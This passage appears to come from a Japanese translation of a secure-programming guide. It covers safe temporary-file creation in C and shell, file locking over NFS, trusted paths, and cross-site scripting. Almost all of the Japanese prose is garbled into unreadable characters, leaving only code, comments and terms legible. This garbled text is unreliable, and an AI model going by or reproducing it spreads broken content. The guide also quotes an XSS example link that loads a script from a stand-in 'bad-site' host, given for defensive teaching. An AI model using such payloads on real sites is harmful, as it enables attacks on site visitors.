 (void) umask(old_mode);                                                        
 if (temp_fd == -1) {                                                           
   failure("Couldn't open temporary file");                                     
 }                                                                              
 if (!(temp_file = fdopen(temp_fd, "w+b"))) {                                   
   failure("Couldn't create temporary file's file descriptor");                 
 }                                                                              
 if (unlink(temp_filename_pattern) == -1) {                                     
   failure("Couldn't unlink temporary file");                                   
 }                                                                              
 return temp_file;                                                              
}                                                                               
                                                                                
                                                                                
/*                                                                              
 * Given a "tag" (a relative filename ending in XXXXXX),                        
 * create a temporary file using the tag.  The file will be created             
 * in the directory specified in the environment variables                      
 * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise             
 * it will be created in /tmp.  Note that root (and su'd to root)               
 * _will_ use TMPDIR or TMP, if defined.                                        
 *                                                                              
 */                                                                             
FILE *smart_create_tempfile(char *tag)                                          
{                                                                               
 char *tmpdir = NULL;                                                           
 char *pattern;                                                                 
 FILE *result;                                                                  
                                                                                
 if ((getuid()==geteuid()) && (getgid()==getegid())) {                          
   if (! ((tmpdir=getenv("TMPDIR")))) {                                         
     tmpdir=getenv("TMP");                                                      
   }                                                                            
 }                                                                              
 if (!tmpdir) {tmpdir = "/tmp";}                                                
                                                                                
 pattern = malloc(strlen(tmpdir)+strlen(tag)+2);                                
 if (!pattern) {                                                                
   failure("Could not malloc tempfile pattern");                                
 }                                                                              
 strcpy(pattern, tmpdir);                                                       
 strcat(pattern, "/");                                                          
 strcat(pattern, tag);                                                          
 result = create_tempfile(pattern);                                             
 free(pattern);                                                                 
 return result;                                                                 
}                                                                               
                                                                                
                                                                                
                                                                                
main() {                                                                        
 int c;                                                                         
 FILE *demo_temp_file1;                                                         
 FILE *demo_temp_file2;                                                         
 char demo_temp_filename1[] = "/tmp/demoXXXXXX";                                
 char demo_temp_filename2[] = "second-demoXXXXXX";                              
                                                                                
 demo_temp_file1 = create_tempfile(demo_temp_filename1);                        
 demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);                  
 fprintf(demo_temp_file2, "This is a test.\n");                                 
 printf("Printing temporary file contents:\n");                                 
 rewind(demo_temp_file2);                                                       
 while (  (c=fgetc(demo_temp_file2)) != EOF) {                                  
   putchar(c);                                                                  
 }                                                                              
 putchar('\n');                                                                 
 printf("Exiting; you'll notice that there are no temporary files on exit.\n"); 
}                                                                               

Kennaway ́Amkstemp(3)gȂȂAmkdtemp(3)găfBNg
悤ɐĂ܂B΁AO܂BŏIIɁA
SłȂ mktemp(3)gȂ΂ȂȂȂA\łȂ
g悤ɂĂĂ܂B 10 ߂ł(libc )B
΁At@C͊ȒPɂ͐łȂȂ܂(6 ƁA5 
PID ŎĂ܂̂ŁA_Ɏcꂽ̂ 1 ɂȂĂ
܂Bł͍U҂ɊȒPɋԂĂ܂܂)B
 tmpnam(3)̗p悤ɒĂ܂BXbhĂ
tmpnam(3)gpƁAǂȂ̂킩܂B܂ TMP_MAX z
Ďgp(pA1 ̃[vŎgpȂ΂܂)
삪ۏ؂ł܂B

T mktemp(3)  tmpnam(3)̂悤ȁASłȂ֐̎gpׂ͔
łBgpȂAZLeB_ɓʂȏuuAS
ȃCu̎̃eXgCXg[̈ƂčsĂB
肪낢날ĂȂA/tmp Nł(̓O[vM
ĂȂȂAO[vŏ)fBNgɃt@CāAmk*temp
()gȂȂ(Ƃ΁AOOɂ킩Ăt@CӐ}
)A O_CREAT  O_EXCL tOt open()ĂяoAԂl`
FbNĂB open()sȂA͓̎K؂Ɍ㏈Ă
(Ƃ΁Aexit )B

GNOME ̃vO~OEKChCł́At@CVXeEIuWFN
gL(e|)fBNgɍ쐬ꍇAL C R[h
Ă܂B͍ŏ̃ZLeBŃt@C쐬̂ړI
B

 char *filename;                                                       
 int fd;                                                               
                                                                       
 do {                                                                  
   filename = tempnam (NULL, "foo");                                   
   fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);    
   free (filename);                                                    
 } while (fd == -1);                                                   

ŒڂȂ̂́ASłȂ֐ tempnam(3)gĂĂA[v
 O_CREAT  O_EXCL gāAZLeB̎_Jo[Ă_
łBڂė~̂́At@C free()KvƂłB
IAclose() unlink()ׂłBW C o̓Cu
gȂAfdopen()uw+bvŎgpāAt@CfBXNv^
FILE * ɕςĂB̉@́ANFS version 2 (v2)̃VXe
͂܂Ȃł傤BŔAÂ NFS  O_EXCL ƃT|[g
ĂȂłB̉@ɂ͂Ƃ_āAtempnam
SɎgȂƁARpCZLeBEXLi邳x
o܂B mkstemp(3)ł͖ƂȂ܂B

VFXNvgŃe|Et@CKvȂ΁ApCvgă[
JfBNg(Ƃ΁A[Ũz[fBNĝǂꂩ)A
ꍇɂĂ̓JgfBNg𗘗p̂K؂ł傤B
΁A[UȂ͋L͂肦܂BǂĂ /tmp ̂悤
ȋLfBNgɃe|t@C肽A͕KvȂA]
̃VF̃eNjbNgāAt@ĈЂȌ`ɃvZX id
gݍ݁AʂɁu>vŃt@CẮA܂BVFX
Nvǵu$$vg pid ܂AU҂͊ȒP pid 
͐ł܂BčU҂́AOŎOɃt@C쐬
AN肵Ă܂܂B܂AĹu肪vȃVFX
NvǵASł͂܂B

   echo "This is a test" > /tmp/test$$  # DON'T DO THIS.               

VFXNvgŃe|t@CKvłA/tmp ɒuꍇ
A mktemp(1)@ɂȂ̂Ǝv܂Bmktemp(1)̓VFXNvg
̗pOɂĂ܂B mktemp(1) mktemp(3)͕ʕŁAmktemp(1)͈
SłBƁA̓VFXNvgŋLfBNgɃe|
t@CイĂ킯ł͂܂B̂悤ȃt@C
vCx[gȃfBNgɍ쐬邩ApCvgD܂
Ǝv܂BǂĂKvȂAmktemp(1)łЂȌ`āA
O_EXCL Ńt@CfBNg쐬AŏIIɃt@CԂ悤
܂B O_EXCL g΁A/tmp ̂悤ȋLfBNgłSɂȂ
( NFS version 2 gĂȂ)BŁAƂ
mktemp(1)  Bourne VFŗpĂ݂܂B̗ mktemp(1) man 
炻̂܂܎Ă܂B

 # Simple use of mktemp(1), where the script should quit               
 # if it can't get a safe temporary file:                              
                                                                       
   TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1                           
   echo "program output" >> $TMPFILE                                   
                                                                       
  # Simple example, if you want to catch the error:                    
                                                                       
   TMPFILE=`mktemp -q /tmp/$0.XXXXXX`                                  
   if [ $? -ne 0 ]; then                                               
      echo "$0: Can't create temp file, exiting..."                    
      exit 1                                                           
   fi                                                                  

e|t@ĆAėpȂł(܂폜čč쐬
)BɁuSȁve|̃t@CŏɓꂽƂĂł
BU҂́AIWĩt@CāAxڂɍėpOɏ
Ă܂܂BK؂ȃp[~bVɂ
BƂ΁ANłA͂O[ṽt@CɃANZ
XKvȂÃANZXĂBȂ
A[h 0600 ɂĂĂ(Ȃ킿AL҂ǂݏł
悤)B

ƌnĂBIgAUNIX t@CVXe
ۂ̏@𗘗pāA쐬ƂƂɃt@C unlink()ĂB
ƃfBNgEGg͏Ă܂܂At@Ĉ̓t
@CwŌ̃t@CEfBXNv^܂ł̓ANZX
悤ɂȂĂ܂B΁AvO̓t@CEfBX
Nv^oRŃt@CɃANZX܂Bt@C unlink 
̂́AR[heiX̂ɔɖ𗧂܂Bt@C̓vO
NbVƂĂIɍ폜܂B unlink Ɗ
҂fBXNXy[Xǂ̂炢邩킩ɂȂƂ
͂܂B͒PɖOł̓t@CVXeȂȂ邩
łB

ϐ TMP  TMPDIR ̒lmɐMłƂ납瓾AR[h
 Unix CNȃVXeȂÅϐ𑸏dĂ悢
܂B΁A[U̓e|t@Cz[fBNg
̃TufBNĝ悤ȋLĂȂfBNgɈڂ܂(
Ř_ł܂)B Bastille ̍ŋ߂̃o[Wł́A[
UԂŋL炷悤ɁA̕ϐݒł悤ɂȂĂ܂B
cOȂA[U TMP  TMPDIR ɋLfBNg(Ƃ /tmp)
ݒ肵ĂP[XAˑRƂĈSKvȃvOł́A
̊ϐݒ肵ĂĂAe|t@C쐬Kv
܂B GNOME ̉@ɂ͒ 1 ܂BȂƂVX
eł́A tempnam(3)͎I TMPDIR 𗘗p܂Amkstemp(3)œl
ȂƂɂ́AɃR[hȂ΂ȂȂłBe|
fBNgpɂɊϐ(TEMP ̂悤)Ȃ悤ɂĂ
BɃAvP[Vɕʂ̊ϐȂł (
΁AuMYAPP_TEMPv̂悤ɎgȂ)B쐬Ă܂ƁAVXe
ƂĂGɂȂĂ܂܂B̃AvP[Vpɐp̃e
|t@C]ł郆[UÃAvP[V𓮂Ɋ
ϐƎɐݒłĂ܂܂BÅϐM
Ȃ\[XŐݒ肳Ă܂ȂA𖳎Ȃ΂܂
BSection 4.2.3 ɂAhoCXɏ]ȂAǂ݂̂Ȃł傤B

̃eNjbŃAe|fBNg NFS version 2 (NFSv2)
}EgA[g̃fBNgłƂ܂܂B
NFSv2  O_EXCL T|[gĂȂłBڂƂ 
Section 6.10.2.1 ĂB NFS version 3 ȍ~ł O_EXCL 
ƃT|[gĂ܂Be|fBNǵA[Jɍ쐬
邩ANFS gă}EgȂA NFS version 3 ȍ~ĝ
₷łB NFS v2 ňSɃe|t@C쐬ɂ
Alink(2)  stat(2)gp܂Aʓ|łBɂẮASection
6.10.2.1 ɏڂ񂪂܂B

͂ĂAFreeBSD ŋ߂ɂȂ mk*temp()nŃt@C pid 
tȂ悤ɂ_́Aڂɒl܂Bpid ł͂ȂAbase-62 ŃGR
[h_ȒlɊSɒu܂B̂ƂɂāuftH
gv 6 gpe|t@C啝ɑ܂B܂
A6 g mktemp(3)łApɂɎgpȂ΁AO̐ɑ
ĂȂ (mIɂ) SɂȂ܂BłɂȂ炤
Aނ炪głł傤B

e|t@CɂĂ̏̑́A Kris Kennaway  2000 N
1215 Bugtraq փe|t@CɂēeL <http://
lwn.net/2000/1221/a/sec-tmp.php3> ɂĂ܂B

 

6.10.2. bN

vO(Ƃ΁At@CfoCXAT[oEvZX
̑) ɑ΂āArIȌmۂȂ΂ȂȂ󋵂悭
B\[XbNVXe͂ǂłA悭郍bN̖A
fbhbN(u̕i(deadly embrace)v)⃉CubNAăv
ObNЂÂȂꍇ́ucꂽvbN̉ɑΏ
Ȃ΂܂BfbhbŃAꂼ̃vO\[X
̂҂āAgƂȂꍇɔ܂BƂ΁Afb
hbŃAvZX 1 \[X A bNA\[X B 
̂҂ĂԂŁAvZX 2 \[X B bNA\
[X A ̂҂Ă鎞ɋN܂BfbhbN̑́A
̃\[XbNvZXׂĂAt (Ƃ΁A
bN閼OAt@xbgɂ)ŃbNsΊȒPɉł܂
B

 

6.10.2.1. t@CbNɎgp

Unix CNȃVXeŃ\[XbNɂ́A܂ł̓t@C
ăbNĂ܂BꂪɈڐA@łB
܂̕@ł́AbN̎c[ȒPɁuCvł܂BŔAǗ
t@CVXe΁AǂȃbNݒ肵Ă̂킩邩
BbN̎c[́AvOgЂÂɎs(Ƃ΁AN
bVA듮삵肵ꍇ)AVXeŜNbVꍇ
N܂B́uAhoCUv((mandatory)ł͂܂)b
Nł邱ƂɒӂĂB\[XKvƂĂvZXׂ
͂̃bNĎgȂ΂܂By󒐁Ft@C̃bN
@\ɂ́AbN(mandatory locking)ƃAhoCUEbN(advisory
locking)܂BႢ́AO҂̓J[lvZXĎbN
ŝŁAvZXԂ̈ˑ֌WzăbN\ł̂ɑ΂āA
҂̓vZXgbNŝŁÃvZX̐Ô̂
΂Ă̓bNƂȂ܂Bڂ́AJ[lt̃hLg
linux/Documentation/mandatory.txt QƂĂz

AȂ΂ȂȂƂ܂B܂AȑOg
 C vÔgȂ悤ɂĂB̕@ł́A
create()͂Ɠ open()ĂяoAopen()̃[h
O_WRONLY | O_CREAT | O_TRUNC Ƃăt@C̃[h 0(p[~bV
Ȃ) Ƃ܂Bʏ̃t@CVXeŁAʃ[Uŝł
͂܂񂪁A[U root ̓Ăꍇɂ́At@C
̃bNɎs܂B root ̓t@Cɑ݂ĂĂAɂ̑
삪słĂ܂܂BہAÂ Unix o[Wł́Aɂ̃G
fB^łuedv̓IȖĂ܂BƂApX
[ht@C̈ꕔ[Ũt@CɂȂĂ܂ۂ܂
[Rochkind 1985, 22]B邩ɁAvZXɎgbN[J
t@CVXeɍȂAopen() O_WRONLY | O_CREAT | O_EXCL t
OĎgpׂł (܂ł́Ap[~bV͂Ȃ΁A
[Ȗ̃vZX̓bNlł܂)B O_EXCL ́Aɂ
urIȁvt@C̍쐬Ɏgp܂B̓[J̃t@CVX
e root ɑ΂Ăʂ܂[Rochkind 1985, 27]B

ɖƂȂ̂AbNt@C NFS Ń}Egt@CVXe
ɍ쐬ꍇłBNFS version 2 Aʏ̃t@CĂ@\
Sɂ̓T|[gĂȂ_łB́ANCAgu[
Jvɂ邱Ƃ肵ē삷ꍇƂȂ܂BNCAg
ẮA[JŃfBXNȂ̂₷ׂẴt@C NFS oR
Ń[g}EgĂ̂邩łB open(2) ̃}jAł
̃P[ẌĂ܂(root ̃vÖĂ
)B

"ccvO open(2) O_CREAT  O_EXCL ɈˑĂꍇAb
N@\𓮂ƋԂɂȂ邱Ƃ܂BbNt@CgăA
g~bNɃt@CbNɂ́At@CVXeɃj[
Nȃt@C쐬(Ƃ΁AzXg pid gݍ킹)Alink(2)
gẴbNt@CɃN𒣂܂B stat(2)gāA
̃j[Nȃt@Cɑ΂ăNEJEg 2 ܂őĂ邩`
FbN܂Blink(2) VXeR[̕Ԃl͎gpȂłB"

ǂlẲł́AׂẴvOăbNs
Ƃ܂삵܂BĂȂvOĂ܂
܂BɁAt@C̃bNɎgĂfBNgŁAt@C
E폜łp[~bVĂ͂܂B

NFS version 3 ɂ O_EXCL [h open(2)ŃT|[g@\ǉ
܂BIETF RFC 1813 āAɁuCREATEvɑ΂u[hvĺu
EXCLUSIVEv悭ĂBcOȂƂɁAł݂͂Ȃ݂ NFS
version 3 ȏɈڍsĂ킯ł͂܂BāAڐAK
vȃvOł́A̋@\𗊂݂ɂł܂BIɂ݂΁A
̖肪]݂܂B

[J}Vɑ݂foCXvZXbNȂAWI
񑩎Ă݂ĂB Filesystem Hierarchy Standard (FHS)̗p
𐄏܂B Linux VXe͍L FHS QlɂĂ邾łȂA
 Unix CNȃVXẽACfBA荞ƂĂ܂B FHS ̓t
@C̃bNɂĂĂAO̕tAuAt@C
WIȓeɂĐ荞ł܂[FHS 1997]B}VŃT[o 2 
sĂȂPɊm߂ȂAʏ /var/run/NAME.pid Ƃ
vZX̎ʎq쐬A̒gɂ pid Ă܂B悤
󋵂 /var/lock ̃foCXpbNt@Ĉ悤ɁAbNt@C
ׂłB̉@ł́AvO\ɃnOAbv
ƁA֘At@Cc܂܂ɂȂĂ܂__ƌΌ_ł
Bꂪʂ̂Ȃ̂ŁÃVXec[gĊȒPɉ
ł܂B

ē삵ĂvOAt@CgăbN񋟂̂
AfBNggłȂÂfBNggp
̂؂łBlbg[N𗘗pĂVXeł́AꂪƂȂ
܂BFHS ł͂͂ƁA/var/run  /var/lock ͋LȂA/var/mail
͋LłƌyĂ܂B܂APƂ̃}Vœ삷郍bN
KvŁÃ}Ve󂯂ȂȂA/var/run ̂悤ȋLȂf
BNggpĂ (Ƃ΁Aꂼ̃}VƎŃT[o
삷̂ꍇ)BA}VׂĂŃlbg[Nɂt
@CLAbNɏ]ȂALĂfBNggK
v܂B/var/mail ͂ȃfBNgꏊ 1 łBFHS ̃ZN
V 2 ɂ̘bɂĂ̂ɏڂ񂪂܂B

 

6.10.2.2. bNg̉@

AbN̂Ƀt@CgKv͂܂Blbg[NT
[oȂ炱̓_ɂĂقƂǔYޕKv͂܂B|[gɐڑ
Ă铮bNƂĈł悢łB܂A|[gɊ
ɐڑĂT[o΁Aȏセ̃|[gɃT[o͐ڑł
ȂȂ܂B 

bNsʂ̉@ƂāAPOSIX ̃R[hEbN܂B
 fcntl(2) gāuCӃbN(discretionary lock)vƂĎ
@łB͔CӂɎg܂B܂肱gɂ́AbN
KvƂĂvOē삵ĂȂ΂Ȃ܂(t@C
găbNŝƓ悤)B POSIX R[hEbN𐄏
̂ɂ́AR񂠂܂B POSIX R[hEbŃAقƂǂ
Ă Unix CNȃvbgtH[ŃT|[gĂ(POSIX.1 Ōɐ
Ă܂)At@C̈ꕔ(t@CŜł͂Ȃ)bNłAǂݏ
ꂼ̃bN܂BɂāAvZX񂾂ƂĂ
bNIɉ܂Bʏ킱ꂪ]܂łB

bNg܂B System V ̋bNZpx[XɂĂ
܂BbNꂽt@C setgid rbg͐ݒ肵Ă邪AO[v
srbgݒ肳ĂȂt@CɂKp܂B܂At@
CbNɂ́At@CVXe}EgȂƂ܂
B̏ꍇAread(2)  write(2)ꂼꂪAbN鎞Ƀ`FbN
B̂̓AhoCUEbNOꂵĂ̂ŁAxȂ
B܂AbŃA Unix CNȃVXeɍLڐAĂ
킯ł͂܂(Linux  System V x[X̃VXeł͗pł܂
Ȃ͕Kł͂܂)B root vZXA
bNŎ~߂܂̂ŁAT[rXۍǓɂȂ܂B

 

6.11. MłoHM邱

ʓIɁAMłoH̏(͂⌋)MĂB
Ƃ΁A[JE[ÚAgetlogin(3)  ttyname(3)Ԃ𐧌
ł̂ŁAZLeBړIł͐MpĂ͂܂B

Rs[^ō\ꂽlbg[N(C^[lbgŜɂĂ͂܂
) ̑啔ɂāA`̐ؖĂȂ΁AMɒl
܂BƂ΁AJꂽC^[lbgzɂĂpPbg
AoĤǂ̏ꏊł邱ƂAC邱Ƃ\łB܂AV
ǂ̃pPbg₉\łB₂ꂽpPbǵA󂯎̉
(}ṼAhX(IP)|[g)Ă邩܂B
āAF(Ƃ΁AÍg)łȂ́Ȁ 1 ̊
ƂāAZLeB̔fȂłB

܂ȎȂATCP/IP Ń[UF؂sꍇ́AF؂̎dg
݂ƂĉL 2 ̌ÏLeNjbNPƂł͎gpȂ悤ɂĂ
BeNjbN 1 ́A[Uu}Vvɐ@ŁAf[
^pPbg̃}V́un_vAhX`FbN܂B̕@
́A肪uMłv|[gԍ(1024 Ԉȉ)̗pv邱Ƃ
āAANZX܂B́ÅɂāAU҂
̒l₂ł_ɂ܂B

ł́A̒l(̃}V IP AhX|[gԍ)
`FbNɈӖꍇ܂̂ŁAvOł̂悤ȃ`FbN
IvVƂăT|[ĝ͈ȂlłBƂ΁At@CA
[EH[̔wɂVXeŁAt@CA[EH[jꂽAI
ꂽłȂłB炫ĂƑĂ邪A͊O
ĂĂpPbg}ĂȂAĂĂ邱Ƃɂ
ĂpPbǵAׂĖ{ɓ炫ĂƂ܂BpPbg
Aۂɂ̃}VƂĂꏊ炫ĂƊmFłȂ_ɒ
ӂĂBāAΏł̂͊ŐЂŁA
̋Ђɂ͑Ώł܂BAt@CA[EH[Ă
Aʂ̌oHAoCp̐ڑ肷ƁȂO񂳂
^킵̂ɂȂĂ܂܂B

́ANF؂B̎iAMłȂł_łBM
łȂlbg[NzɁAMłoHKvȂ΁Aʂ͉炩
Í쐬Zp(ŒłÍIɈSȃnbVZp)̏KvƂȂ
BÍASYƒʐMvgRɂĂɏڂ́ASection
10.5 ĂBWIɎgĂ̂́A{SłȂvgR
(Ƃ ftp Ƃ rlogin)sĂȂAftHgSɂ
AhLgɂ͑O𖾋LĂĂB

hCEl[ET[o(DNS)͍LC^[lbgŗpĂAR
s[^ IP AhX(l)̑gێǗĂ܂BuDNS 
tvƂ@g΁APȃXv[tBOÜꕔrł
AzXg鎞ɂ𗧂܂B̂́AF؂
߂قǂ̐M܂B܂ƂȂ̂́ADNS ̃NGXg
Aǂ͍U҂Rg[Ă邩Ȃǂ̃VXeɑ
đĂ\AƂ_ɂ܂BāADNS 
ꂽʂ͂ǂmFKv̂ŁAdvȃANZ
X̎iƂĐMpł܂B

dq[(uFromvɏĂAhX܂)₂ł܂B̂悤
ȍÚAdqgΖhꍇ܂BƊȒPȖh
Adq[Ƀ_ɔlYtĂƂ肷@łB
z̋KȂ悤ȁAJ[OXgւ̓o^ȂΏ\p
ł܂B

CGI ܂ރNCAgET[ofł́ANCAg(̓NCA
gƃT[o𒇉鉽)AǂȒlύXłĂ܂_ɒӂĂ
BT[o͂̓_ɋCĂȂ΂Ȃ܂B
ƁAuBtB[hvANbL[́ACGI vOl
󂯎OɃNCAgŒlύXłĂ܂܂Bɗ\hu
ȂA͐Mł܂BƂ΁ABtB[h̓T[o
`FbNĂȂANCAg₂łȂ悤ɏł
͂łBBtB[h́AMłT[oł錮g
Íł܂ (҂̉@́AKerberos F؋@\{IȍlƂ
Ĕwiɂ܂)B InfoSec labs(http://www.infoseclabs.com/mschff/
mschff.htm)ł͉BtB[hÍɂĂɓ˂񂾋c_
Ă܂BʓIɃNCAgET[ofł́AT[oɔzKv
ȃf[^ƂĂłBŁACGI vOŔF؂
sꍇAHTTP_REFERER ɗȂ悤ɂĂB̓[Ũu
EUĂ̂ł(Web T[oł͂܂)B

̖́Ãf[^QƂf[^ɂĂ͂܂܂BƂ΁A
HTML  XML ͑̃t@C(Ƃ΁ADTD X^CEV[g) [g
ɂƂĂAQƂł悤ɂȂĂ܂BAOQƂ͕
XłĂ܂̂ŁA[U͈Ӑ}̂Ƃ͂܂hLg
邱ƂɂȂ܂BX^CEV[g͏dvȕ̒Puh
ԂāvύXłĂ܂܂̂ŁAڂAVeLXg
}ł肵Ă܂܂BO DTD ͓̃hLg̎gp}
(DTD ̑Ó錾邱Ƃ)AhLgɕʂ̃eLXg
}肵āAύX\ł [St. Laurent 2000]B

 

6.12. MpX(Trusted Path)݂

MłoH(Section 6.11Q)ƓȂ̂ɁA[UgƂĂ
vOVXeA{ɓ삵Ă̂[Uɑ΂ĕۏ؂
邱Ƃ܂B

܂ł悭ႪuOC悤Ɍ(fake login)vv
OłBvOVXẽOCʂ̂悤ȕ\΁A\
ςȂɂĂ܂B[UOC悤ƂƁAOC
悤ɌvO̓[ŨpX[h肵Aŗp
܂B

̖ɑ΂􂪁AuMpXvłBMpX́A[Uɂ
Ƃ肵ƂƂłm񋟂VvȎdg݂łB
Ƃ肷񂪉łĂAU҂肵AύXł
Ƃۏ؂܂B

pX[hvꍇAMpXpӂ悤ɐSĂB
cOȂA Linux fBXgr[V Unix ɂ́Aʏ̃
OC葱ɂAMpXpӂĂ܂B@ 1 ɁA
OCOɉ₂łȂL[̉vƂ肪܂B
Ƃ΁AWindows NT  2000 ̃[ÚAOCOɁu
control-alt-deletevL[g܂BʓI Windows ̃vOȂA
̃L[̑gݍ킹ł܂B̂MpXłB
Linux ɂZLAEAeVEL[ (Secure Attention Key (SAK))
<http://lwn.net/2001/0322/a/SAK.php3> Ƃȋ@\݂Ă܂
BɂƁAucontrol-alt-pausevL[̎gp𐄏Ă܂B
̃hLgĂ鎞_ł́ASAK ͊ĂƂ͂A
Lihux fBXgr[VłT|[gĂƂ͌܂B[J
ōMpX 1 ̕@ƂāAOCEvO
삷ƗfBXvCǗ܂BƂ΁AM
vOL[{[h̃Cg(Num Lock  Caps LockA Scroll
Lock  LED)ύXłȂAOCEvO͓p^\
āAꂪ{̃OCEvOłƎ܂BcOȂ猻
 Linux ̈ʃ[U LED ύXł܂̂ŁALED ͍MpXmF
̂ɗpł܂B

ȂƂɁAlbg[NEAvP[VƂȂƂɖ肪[
ɂȂ܂BMpX݂̂́Albg[NEAvP[Vɂ
ĈӖ܂AɎŝ͂Ȃ荢łBlbg[Nz
ɃpX[h𑗂鎞A߂ĐMłI[mԂŃpX[hÍ
ĂBΏȂƂAVXeɐڑĂȂU҂̓p
X[h𓐒ł܂B܂ȂƂUÂ炭Ȃ܂B
ɂ肷邽߂̍MpXSzȂAK肪ÍAF
؍ς݂ł悤ɂĂ(ŒAF؂͍ς܂Ă悤)B

ʂƂāAlbg[NEAvP[V͍MpX\ł͂
BƂ킯 Web x[X̃AvP[Vł͂ꂪłB悭m
ꂽ@ƂāAWeb uEŨ[U܂Aۂ͕ʂ̂ƂȂ̂ɁA
ꏊɂƎv킹肪܂BƂ΁AFelten[1997]ł́AuWeb
Xv[tBOv_ĂĂ܂B[U Web TCg̃y[W
ƐMĂĂA͂ Web TCĝׂẴy[ẂAU҂̃TC
goRČĂƂ̂ł (U҂́AׂẴgtBbN
āAoɑĂǂȃf[^ύXł܂)B URL 
ɂĎĂ܂B URL ̏́A̋Zp(Javascript
̂悤)g΁AقƂǌȂ邱Ƃ\ŁAXe[^Xs⃍P
[Vs̑Ɍ`ՂقƂǎc܂Bڍׂ̓hLgĂ
Bɂ URL BZpƂāAقƂǎgĂȂ URL ̕@
p̂܂BƂ΁Auhttp://www.ibm.com/
stuff@mysite.comvƂ URL ́Aۂɂ́uwww.ibm.com/stuffvƂ
[UŁumysite.comv(ӂTCg܂)v𔭍s
܂B URL 炵Ζ{̃TCg͕\ꂸA[U͂ǂ
ĂꂽقƂǋCtȂł傤Bɂ̕@ɁATC
g쐬Ă̖O킴Ɓu{́vTCgƓ悤ȖOɂĂ
肪܂B[U͋ʂȂ܂BLׂẴP[
XɂāAPɍsÍĂɂȂ܂BU҂͉\
邩ɐł̂ŁAÍꂽf[^ł܂肪܂
B

̖Ώ̂͂ɍłBł́Au܂ꂽvWeb
[UĥɗLȋZpI@͂킩܂B Web uEŮJ
҂ɑ΂āÂ悤ȁu܂vȒPɌ邱Ƃő΍R悤
ɓłB[UTCgɊԈႢȂڑł邱
dvȂ΁APȎ葱ŋЂɑ΍RȂ΂܂BƂ΁A
uEU𗎂ƂčċNAWeb ̃AhXƂĂ₷
͂Ă邩KmF܂(Γ͊ԈႢ͋N肦܂)B
܂Au悤ȁvł DNS ̏LlĂ܂
Ȃ DNS ̂ToāAU҂Ă܂Ă悢
傤B

 

6.13. ňѐ`FbNR[h𗘗p

vÓAĂяo{Ԃ̑O񂪈SȂ̂`FbNĂ
B C ł́Aassert(3)̂悤ȃ}NA`FbNɖ𗧂Ǝv܂B

 

6.14. \[XȐ䂷

lbg[NEf[ɑ΂ẮAߕׂ}A肵Ă
Blݒ肵(setrlimit(2)g)Agp郊\[Xɐ
ĂB߂ setrlimit(2)gāAucorevt@CłȂ
悤ɂĂBƂ΁AftHg Linux  core t@C
AvOُȏԂŗɁAvOׂẴۑ
܂B̃t@Cɂ̓pX[h͂߁Aɂ@̃f[^
Ă邩܂B

 

6.15. TCgɂ܂đ݂鈫ӂRech

SKvȃvOɂ́AMłȂ[U(U)f[^
Ãf[^ʂ̃[UEAvP[V(])ɓn̂
܂BSKvȃvO]҂ی삵ĂȂ΁A]
ƂȂAvP[V(Ƃ Web AvP[V)́Ãf[^
āA]҂ɊQyڂ܂B́AHTML  XML 𗘗p Web Av
P[Vł͂Ƃ킯ǂŁAuNXTCgEXNve
BOvuӂ HTML ^OvAuӂRecvƂ
̌ĂѕŒʂĂ܂B̃hLgł́A̖uTCgɂ܂
ӂRecvƌĂт܂BXNvg HTML ɖ肪ڂ
Ă킯ł͂ȂATCgɂ܂鐫̍{łB
 Web AvP[VɌ̂ł͂܂񂪁AWeb AvP[
VɂƂĂ͓ʂɖƂȂ̂ŁAꂩ炱̃hLgł Web
AvP[Vɏœ_𓖂ĂĘ_Ă܂B܂Ȃčs܂
AU҂͎ɋ]҂f[^SKvȃvOɑ΂đ
悤Ɏdꍇ܂BňSKvȃvÓA]
gĂȂ΂܂B

 

6.15.1. 

܂͒PȗႩ͂߂܂傤B Web AvP[Vɂ́AHTML ^O
Ń[Ũf[^͂Aő̓ǎ҂ɓê܂
(Ƃ΁AQXgubNuǎ҂̃RgvR[i[)Bh䂷i
uȂ΁A^Oӂ郆[UpāAXNvg Java ɑ
QƁADHTML ^OAhLg̑I(</HTML> g)A
tHgTCY̗vꍞނƂŁÃ[UɍU
܂B̋@\́AL͈͂ɉeyڂ\܂BƂ΁ASSL
ňÍꂽڑ炵Ă܂AĂ Web TCgɃN
CAgoRŃANZXłAhCx[X̃ZLeBE|V
NQA Web TCg̃y[Wǂ߂ȂAWeb TCg̃y[W
gɑςȂ̂ɂ(Ƃ΁Ao[i[sȑfނō点)A
vCoV[NQĂ܂(Ƃ΁AWeb ̃oOꍞŁAN
ǂ̃y[Wǂ񂾂L^Ă܂)AT[rXۍUs(
΁AEChEuɁvJ)AjIȍU(uEŨXNvg
obt@I[o[t[̂悤ȃZLeB̐Ǝ㐫U)s
肵܂BKȏꏊɈӂ FORM ^OgݍނƂŁAN҂
[U܂āA@炳邱Ƃ\ɂȂ܂(̃tH[
̓ύX邱Ƃ)B͖ԗXgł͂܂񂪁A
͏d傾AƔ[Ă炤ɂ͏\ł傤B

啔́ufvŊɂ̖肪Ă܂B̓̂قƂǂ
́Al̋c_̈ꕔ̂߂ɗpӂeLXgőΏĂ܂BcO
Ȃ Web AvP[V̊J҂̑啔́A̖肪ʂɔ
̂Ƃ͋CÂĂ܂B郆[Uʂ̃[Uɑf[
^l͂ǂłATCgɂ܂ӂ铊ěɂȂ肦܂B
̏ꏊAǂ HTML łuƂu炩ɋ^킵vꍇł
ĂłB[Ugӂf[^Ă܂P[X܂
B܂A[U܂āÃTCgoRŃf[^񋟂Ă܂
łB HTML NŃ[Uӂf[^𑼂̃TCgɑ
܂Ă܂(CERT p܂)B

 <A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT             
 SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>              

܂ Web AvP[V́A`FbNtB^OAȂł
(tH[f[^܂)󂯂܂B Web AvP[V͑
̏ꍇA[Uɑ΂Ă͂f[^߂܂B͑̃
[UƂ̃f[^񋟂Ă邩ȂłB̂悤
ȍ\vfƁAVXeɑQ^邩܂B̃VX
e[UUoHɂȂĂ܂\邩łBɈ
ƂɁÂ悤ȍUȂ̃VXeĂĂ悤Ɍ
Ă܂Ȃ_łB

CERT ͊ł̖L̂悤ɐĂ܂B

   
    Web TCgɕspӂɈӂ HTML ^OXNvg荞ދꂪ
    ܂BMłȂ\[X̓K؂łȂ͂ɂāAIɍ
